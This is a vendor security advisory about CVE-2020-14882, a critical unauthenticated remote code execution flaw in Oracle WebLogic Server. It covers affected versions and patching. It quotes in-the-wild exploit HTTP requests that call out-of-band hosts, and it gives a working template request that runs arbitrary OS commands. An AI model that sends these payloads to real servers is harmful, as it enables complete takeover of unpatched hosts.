SecPod

Learn Search

Search across all Learn content

← Back to Security Research
Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882)

Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882)

Critical Remote Code Execution (RCE) vulnerability CVE-2020-14882 in the console component of the Oracle WebLogic Server Exploitation allows unauthenticated, remote attackers to execute commands on the affected servers. Oracle has assigned this vulnerability a CVSSv3 score of 9.8 out of 10, clearly ...

Oct 29, 2020By Vishesh S3 min read

Critical Remote Code Execution (RCE) vulnerability CVE-2020-14882 in the console component of the Oracle WebLogic Server Exploitation allows unauthenticated, remote attackers to execute commands on the affected servers. Oracle has assigned this vulnerability a CVSSv3 score of 9.8 out of 10, clearly showing its criticality, and indicating that it is essential to patch it ASAP. Johannes B. Ullrich, dean of research at the SANS Technology Institute, said in the post vulnerable Oracle WebLogic Servers that have not been patched until now “Assume that someone has compromised it.”. Vulnerability Management Software can prevent these attacks from occurring.

It seems that the exploits originated from a blog post published (in Vietnamese) by “Jang”. In his blog, he described how one can exploit the flaw to achieve remote code execution with only a single HTTP request. To prevent this exploit from occurring, a good patch management software will be helpful.

Vulnerability Details in Oracle WebLogic Server Exploitation

The RCE vulnerability exists in the console component of the WebLogic Server. Sending a crafted HTTP request can exploit the vulnerability and potentially lead to complete control of the host. In his blog post, the security researcher Jang included partial details of the flaw, which can be utilized for a Proof of Concept (PoC).

As discussed in SANS ISC Post, attackers are currently using the following exploits (the honeypot’s IP has been replaced with AAA.BBB.CCC.DDD):

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \”java.lang.Runtime.getRuntime().exec( ‘nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net’) GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22); GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String(\”test\”)

Oracle has given this pre-authentication attack complexity a rating of “low” and has highlighted it as “easily exploitable.” Due to the “low” complexity of the exploit, attackers requires no user interaction and no privileges to exploit the vulnerability.

A typical crafted HTTP request that exploits the vulnerability and executes “calc.exe” is as follows:

http://<domain>/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runtime.getRuntime().exec(“calc.exe“);”);

In the above request, any other OS command can replace “calc.exe”.

Furthermore, Successful exploitation of the vulnerability “calc.exe” executed on the affected host as shown in the below picture.

Publicly available PoC

The proof-of-concept codes are publicly available for the vulnerability.

  • Exploit PoC on Twitter.
  • Exploit PoC on Github.

Impact of Oracle WebLogic Server Exploitation

However, an unauthenticated, remote attacker can exploit this vulnerability to execute commands and gain complete control of the affected host.

Affected Oracle WebLogic Server Exploitation Versions

  • 14.1.1.0.0
  • 12.2.1.4.0
  • 12.2.1.3.0
  • 12.1.3.0.0
  • 10.3.6.0.0

Solution

However, SanerNow has published security content to detect this vulnerability. Evidently, Oracle has already released a security update this month and these patches are available only for Oracle customers. Therefore I advise you to download the patch from the Oracle portal and proceed with its installation. Furthermore, you can utilize SanerNow software deployment capability to install executables/scripts.

Featured Posts

Open Operation CameraSwarm: Inside the Toolkit Behind 14,530 Compromised Dahua Cameras
Operation CameraSwarm: Inside the Toolkit Behind 14,530 Compromised Dahua Cameras

CVE Research

Operation CameraSwarm: Inside the Toolkit Behind 14,530 Compromised Dahua Cameras

A single operator compromised 14,530+ Dahua cameras across Ukraine and Russia in 35 days, chaining credential brute-force, a CVE-2021-33044/33045 authentication bypass, and P2P relay abuse to plant a persistent backdoor and harvest transferable admin access.

Aug 21, 2026

Open Critical GitLab Flaw Exposes Public Projects to Deletion — Two CVEs Patched, Including High-Severity CSRF
Critical GitLab Flaw Exposes Public Projects to Deletion — Two CVEs Patched, Including High-Severity CSRF

CVE Research

Critical GitLab Flaw Exposes Public Projects to Deletion — Two CVEs Patched, Including High-Severity CSRF

CVE-2026-19478 is a critical code injection vulnerability in GitLab CE/EE that allows an unauthenticated attacker to modify or delete public projects and user data by abusing a GraphQL directive. A second high-severity issue, CVE-2026-19650, involves cross-site request forgery in the GraphQL multiplex query handler. This article examines how the critical vulnerability works, the availability of a public proof-of-concept, the potential impact on self-managed instances, the affected versions, and the security updates released to remediate both issues.

Aug 19, 2026

Open No Password Needed: macOS Screen Sharing Flaw (CVE-2026-65400) Used to Deploy Monero Miners
No Password Needed: macOS Screen Sharing Flaw (CVE-2026-65400) Used to Deploy Monero Miners

CVE Research

No Password Needed: macOS Screen Sharing Flaw (CVE-2026-65400) Used to Deploy Monero Miners

Aug 19, 2026

Open Evooo1Bot: Mirai-Based Linux Botnet Turns Edge Devices Into SOCKS5 Proxies
Evooo1Bot: Mirai-Based Linux Botnet Turns Edge Devices Into SOCKS5 Proxies

CVE Research

Evooo1Bot: Mirai-Based Linux Botnet Turns Edge Devices Into SOCKS5 Proxies

Aug 19, 2026

Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882) | SecPod